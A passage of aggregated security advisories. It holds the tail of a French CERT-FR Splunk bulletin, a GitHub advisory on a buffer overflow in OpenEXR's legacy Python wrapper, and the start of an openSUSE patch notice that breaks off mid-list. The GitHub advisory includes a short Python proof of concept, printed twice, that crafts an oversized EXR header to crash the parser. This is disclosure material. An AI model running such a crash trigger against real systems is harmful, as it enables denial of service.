      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24549"
    },
    {
      "name": "CVE-2025-12440",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12440"
    },
    {
      "name": "CVE-2025-58181",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58181"
    },
    {
      "name": "CVE-2025-53054",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53054"
    },
    {
      "name": "CVE-2025-11216",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11216"
    },
    {
      "name": "CVE-2025-47914",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47914"
    },
    {
      "name": "CVE-2018-1049",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-1049"
    },
    {
      "name": "CVE-2025-69418",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69418"
    },
    {
      "name": "CVE-2025-8114",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8114"
    },
    {
      "name": "CVE-2025-15468",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-15468"
    },
    {
      "name": "CVE-2025-58189",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
    },
    {
      "name": "CVE-2025-55668",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-55668"
    },
    {
      "name": "CVE-2025-11210",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11210"
    },
    {
      "name": "CVE-2020-36518",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-36518"
    },
    {
      "name": "CVE-2026-21945",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
    },
    {
      "name": "CVE-2022-31159",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-31159"
    },
    {
      "name": "CVE-2025-12729",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12729"
    },
    {
      "name": "CVE-2025-22870",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
    },
    {
      "name": "CVE-2025-46701",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-46701"
    },
    {
      "name": "CVE-2025-13227",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13227"
    },
    {
      "name": "CVE-2024-30171",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
    },
    {
      "name": "CVE-2025-10256",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-10256"
    },
    {
      "name": "CVE-2026-20162",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-20162"
    },
    {
      "name": "CVE-2025-30749",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
    },
    {
      "name": "CVE-2025-12839",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12839"
    },
    {
      "name": "CVE-2025-9230",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
    },
    {
      "name": "CVE-2025-37727",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-37727"
    },
    {
      "name": "CVE-2025-53040",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53040"
    },
    {
      "name": "CVE-2019-3844",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-3844"
    },
    {
      "name": "CVE-2025-53906",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53906"
    },
    {
      "name": "CVE-2025-12728",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12728"
    },
    {
      "name": "CVE-2025-8916",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
    },
    {
      "name": "CVE-2023-6605",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6605"
    },
    {
      "name": "CVE-2025-8885",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8885"
    },
    {
      "name": "CVE-2022-23302",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-23302"
    },
    {
      "name": "CVE-2025-12430",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12430"
    },
    {
      "name": "CVE-2025-11187",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11187"
    },
    {
      "name": "CVE-2025-11206",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11206"
    },
    {
      "name": "CVE-2025-62408",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-62408"
    },
    {
      "name": "CVE-2018-15686",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-15686"
    },
    {
      "name": "CVE-2021-35938",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-35938"
    },
    {
      "name": "CVE-2025-9951",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9951"
    },
    {
      "name": "CVE-2025-53045",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53045"
    },
    {
      "name": "CVE-2024-12243",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
    },
    {
      "name": "CVE-2025-59729",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59729"
    },
    {
      "name": "CVE-2025-48071",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48071"
    },
    {
      "name": "CVE-2022-42003",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-42003"
    },
    {
      "name": "CVE-2025-53506",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
    },
    {
      "name": "CVE-2023-26604",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-26604"
    },
    {
      "name": "CVE-2025-69224",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69224"
    },
    {
      "name": "CVE-2025-2759",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-2759"
    },
    {
      "name": "CVE-2025-53864",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
    },
    {
      "name": "CVE-2025-53053",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53053"
    },
    {
      "name": "CVE-2025-30153",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30153"
    },
    {
      "name": "CVE-2025-59419",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59419"
    },
    {
      "name": "CVE-2025-69229",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69229"
    },
    {
      "name": "CVE-2024-8373",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8373"
    },
    {
      "name": "CVE-2025-11209",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11209"
    },
    {
      "name": "CVE-2025-30204",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
    },
    {
      "name": "CVE-2024-21490",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-21490"
    },
    {
      "name": "CVE-2024-50379",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-50379"
    },
    {
      "name": "CVE-2023-49501",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-49501"
    },
    {
      "name": "CVE-2019-3843",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-3843"
    },
    {
      "name": "CVE-2018-6954",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-6954"
    },
    {
      "name": "CVE-2025-53057",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53057"
    },
    {
      "name": "CVE-2026-26981",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-26981"
    },
    {
      "name": "CVE-2025-12447",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12447"
    },
    {
      "name": "CVE-2025-53066",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53066"
    },
    {
      "name": "CVE-2013-4392",
      "url": "https://www.cve.org/CVERecord?id=CVE-2013-4392"
    },
    {
      "name": "CVE-2025-48074",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48074"
    },
    {
      "name": "CVE-2024-52316",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-52316"
    },
    {
      "name": "CVE-2016-7795",
      "url": "https://www.cve.org/CVERecord?id=CVE-2016-7795"
    },
    {
      "name": "CVE-2025-12727",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12727"
    },
    {
      "name": "CVE-2025-69420",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69420"
    },
    {
      "name": "CVE-2025-12428",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12428"
    },
    {
      "name": "CVE-2026-20163",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-20163"
    },
    {
      "name": "CVE-2025-11226",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11226"
    }
  ],
  "initial_release_date": "2026-03-12T00:00:00",
  "last_revision_date": "2026-03-12T00:00:00",
  "links": [],
  "reference": "CERTFR-2026-AVI-0281",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2026-03-12T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Injection de code indirecte \u00e0 distance (XSS)"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Splunk. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une injection de code indirecte \u00e0 distance (XSS).",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Splunk",
  "vendor_advisories": [
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0302",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0302"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0311",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0311"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0308",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0308"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0309",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0309"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0305",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0305"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0310",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0310"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0304",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0304"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0301",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0301"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0313",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0313"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0306",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0306"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0303",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0303"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0307",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0307"
    },
    {
      "published_at": "2026-03-11",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0312",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0312"
    }
  ]
}

GHSA-VH63-9MQX-WMJR

Vulnerability from github – Published: 2026-04-06 17:51 – Updated: 2026-04-06 17:51

Summary

OpenEXR has buffer overflow in PyOpenEXR_old's channels() and channel()

Details

Summary

A memory safety bug in the legacy OpenEXR Python adapter (the deprecated OpenEXR.InputFile wrapper) allow crashes and likely code execution when opening attacker-controlled EXR files or when passing crafted Python objects.

Integer overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit).

This bug was found with ZeroPath.

Details

Integer overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit), around here.

In channel():
- Width and height are derived from the header dataWindow using int.
- typeSize is a size_t. The buffer size is computed as typeSize * width * height with no bounds checks.
- The result is passed to PyString_FromStringAndSize(NULL, size) which maps to PyBytes_FromStringAndSize. That function expects Py_ssize_t. If the product overflows or exceeds PY_SSIZE_T_MAX, allocation fails or the value wraps.
- The return value is not checked. The code immediately calls PyString_AsString(r) and proceeds to build a FrameBuffer and calls readPixels(miny, maxy).
- On 64 bit: PyBytes_FromStringAndSize returns NULL, the wrapper dereferences NULL and crashes.\ On 32 bit: the multiplication can wrap to a small positive size, producing a too-small allocation, after which readPixels writes typeSize * width bytes per scanline for height lines into that buffer, causing a heap overflow.
In channels() the same pattern appears for each requested channel. It also ignores per-channel subsampling when computing the allocation and when inserting the Slice it hardcodes xSampling=1, ySampling=1. If a file actually has subsampled channels this makes the stride and allocation inconsistent, which can also lead to over or under writes.

PoC

# write_big_header_then_crash.py
import OpenEXR, Imath

# OpenEXR sanity clamp for header coords is about INT_MAX/2 - 1
INT_MAX = (1 << 31) - 1
MAX_COORD = (INT_MAX // 2) - 1  # 1073741822

# Choose a scanline width that keeps row-bytes < 2^31
# 400,000,000 * 4 bytes = ~1.6 GB per scanline, which many codecs accept
WIDTH = min(400_000_000, MAX_COORD + 1)   # pixels
HEIGHT = 64                                # small height keeps the file tiny

# Build windows from pixel counts
dw = Imath.Box2i(Imath.V2i(0, 0), Imath.V2i(WIDTH - 1, HEIGHT - 1))

# Robustly set NO_COMPRESSION across enum naming differences
def no_compression():
    # Try common names, else fallback to numeric 0
    C = Imath.Compression
    for name in ("NO_COMPRESSION", "NONE", "NO_COMPRESSION_ENUM"):
        if hasattr(C, name):
            return Imath.Compression(getattr(C, name))
    return Imath.Compression(0)

hdr = {
    "dataWindow": dw,
    "displayWindow": dw,
    "channels": {"R": Imath.Channel(Imath.PixelType(Imath.PixelType.FLOAT))},
    "compression": no_compression(),
    "lineOrder": Imath.LineOrder(Imath.LineOrder.INCREASING_Y),
}

# Write just the header (no pixels)
out = OpenEXR.OutputFile("big_header.exr", hdr)
out.close()

# Now trigger the legacy bug: huge allocation request returns NULL, code fails to check
f = OpenEXR.InputFile("big_header.exr")
print("Triggering crash...")
f.channels(["R"])

$ python3 poc.py 
Triggering crash...
libc++abi: terminating due to uncaught exception of type Iex_3_4::InputExc: Unable to query scanline information
Abort trap: 6              python3 poc.py

Impact

Typical memory stuff.

Severity ?

7.8 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

5.5 (Medium)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "OpenEXR"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0"
            },
            {
              "fixed": "3.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "OpenEXR"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0"
            },
            {
              "fixed": "3.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "OpenEXR"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.4.0"
            },
            {
              "fixed": "3.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64182"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-120"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-06T17:51:19Z",
    "nvd_published_at": "2025-11-10T22:15:37Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nA memory safety bug in the legacy OpenEXR Python adapter (the deprecated OpenEXR.InputFile wrapper) allow crashes and likely code execution when opening attacker-controlled EXR files or when passing crafted Python objects.\n\nInteger overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit).\n\nThis bug was found with [ZeroPath](https://zeropath.com/?utm_source=joshua.hu).\n\n### Details\n\nInteger overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit), around [here](https://github.com/AcademySoftwareFoundation/openexr/blob/b3a19903db0672c63055023aa788e592b16ec3c5/src/wrappers/python/PyOpenEXR_old.cpp#L528-L536).\n\n-   In `channel()`:\n\n    -   Width and height are derived from the header dataWindow using `int`.\n\n    -   `typeSize` is a `size_t`. The buffer size is computed as `typeSize * width * height` with no bounds checks.\n\n    -   The result is passed to `PyString_FromStringAndSize(NULL, size)` which maps to `PyBytes_FromStringAndSize`. That function expects `Py_ssize_t`. If the product overflows or exceeds `PY_SSIZE_T_MAX`, allocation fails or the value wraps.\n\n    -   The return value is not checked. The code immediately calls `PyString_AsString(r)` and proceeds to build a `FrameBuffer` and calls `readPixels(miny, maxy)`.\n\n    -   On 64 bit: `PyBytes_FromStringAndSize` returns NULL, the wrapper dereferences NULL and crashes.\\\n        On 32 bit: the multiplication can wrap to a small positive size, producing a too-small allocation, after which `readPixels` writes `typeSize * width` bytes per scanline for `height` lines into that buffer, causing a heap overflow.\n\n-   In `channels()` the same pattern appears for each requested channel. It also ignores per-channel subsampling when computing the allocation and when inserting the `Slice` it hardcodes `xSampling=1, ySampling=1`. If a file actually has subsampled channels this makes the stride and allocation inconsistent, which can also lead to over or under writes.\n\n### PoC\n\n```python\n# write_big_header_then_crash.py\nimport OpenEXR, Imath\n\n# OpenEXR sanity clamp for header coords is about INT_MAX/2 - 1\nINT_MAX = (1 \u003c\u003c 31) - 1\nMAX_COORD = (INT_MAX // 2) - 1  # 1073741822\n\n# Choose a scanline width that keeps row-bytes \u003c 2^31\n# 400,000,000 * 4 bytes = ~1.6 GB per scanline, which many codecs accept\nWIDTH = min(400_000_000, MAX_COORD + 1)   # pixels\nHEIGHT = 64                                # small height keeps the file tiny\n\n# Build windows from pixel counts\ndw = Imath.Box2i(Imath.V2i(0, 0), Imath.V2i(WIDTH - 1, HEIGHT - 1))\n\n# Robustly set NO_COMPRESSION across enum naming differences\ndef no_compression():\n    # Try common names, else fallback to numeric 0\n    C = Imath.Compression\n    for name in (\"NO_COMPRESSION\", \"NONE\", \"NO_COMPRESSION_ENUM\"):\n        if hasattr(C, name):\n            return Imath.Compression(getattr(C, name))\n    return Imath.Compression(0)\n\nhdr = {\n    \"dataWindow\": dw,\n    \"displayWindow\": dw,\n    \"channels\": {\"R\": Imath.Channel(Imath.PixelType(Imath.PixelType.FLOAT))},\n    \"compression\": no_compression(),\n    \"lineOrder\": Imath.LineOrder(Imath.LineOrder.INCREASING_Y),\n}\n\n# Write just the header (no pixels)\nout = OpenEXR.OutputFile(\"big_header.exr\", hdr)\nout.close()\n\n# Now trigger the legacy bug: huge allocation request returns NULL, code fails to check\nf = OpenEXR.InputFile(\"big_header.exr\")\nprint(\"Triggering crash...\")\nf.channels([\"R\"])\n```\n\n```\n$ python3 poc.py \nTriggering crash...\nlibc++abi: terminating due to uncaught exception of type Iex_3_4::InputExc: Unable to query scanline information\nAbort trap: 6              python3 poc.py\n```\n\n### Impact\nTypical memory stuff.",
  "id": "GHSA-vh63-9mqx-wmjr",
  "modified": "2026-04-06T17:51:19Z",
  "published": "2026-04-06T17:51:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-vh63-9mqx-wmjr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64182"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AcademySoftwareFoundation/openexr"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AcademySoftwareFoundation/openexr/blob/b3a19903db0672c63055023aa788e592b16ec3c5/src/wrappers/python/PyOpenEXR_old.cpp#L528-L536"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenEXR has buffer overflow in PyOpenEXR_old\u0027s channels() and channel()"
}

OPENSUSE-SU-2025:15741-1

Vulnerability from csaf_opensuse - Published: 2025-11-18 00:00 - Updated: 2025-11-18 00:00

Summary

libIex-3_4-33-3.4.3-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: libIex-3_4-33-3.4.3-1.1 on GA media

Description of the patch: These are all security issues fixed in the libIex-3_4-33-3.4.3-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2025-15741

CVE-2025-64181

4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

CVE-2025-64182

7.7 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

CVE-2025-64183

6.2 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

References

URL

Category

	https://www.suse.com/support/security/rating/	external
	https://ftp.suse.com/pub/projects/security/csaf/o…	self
	https://www.suse.com/security/cve/CVE-2025-64181/	self
	https://www.suse.com/security/cve/CVE-2025-64182/	self
	https://www.suse.com/security/cve/CVE-2025-64183/	self
	https://www.suse.com/security/cve/CVE-2025-64181	external
	https://bugzilla.suse.com/1253233	external
	https://www.suse.com/security/cve/CVE-2025-64182	external
	https://bugzilla.suse.com/1253234	external
	https://www.suse.com/security/cve/CVE-2025-64183	external
	https://bugzilla.suse.com/1253235	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "libIex-3_4-33-3.4.3-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the libIex-3_4-33-3.4.3-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-15741",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15741-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64181 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64181/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64182 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64182/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64183 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64183/"
      }
    ],
    "title": "libIex-3_4-33-3.4.3-1.1 on GA media",
    "tracking": {
      "current_release_date": "2025-11-18T00:00:00Z",
      "generator": {
        "date": "2025-11-18T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:15741-1",
      "initial_release_date": "2025-11-18T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-11-18T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libIex-3_4-33-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libIex-3_4-33-3.4.3-1.1.aarch64",
                  "product_id": "libIex-3_4-33-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
                  "product_id": "libIex-3_4-33-32bit-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                  "product_id": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libIlmThread-3_4-33-3.4.3-1.1.aarch64",
                  "product_id": "libIlmThread-3_4-33-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
                  "product_id": "libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                  "product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXR-3_4-33-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
                  "product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-3.4.3-1.1.aarch64",
                "product": {
                  "name": "openexr-3.4.3-1.1.aarch64",
                  "product_id": "openexr-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
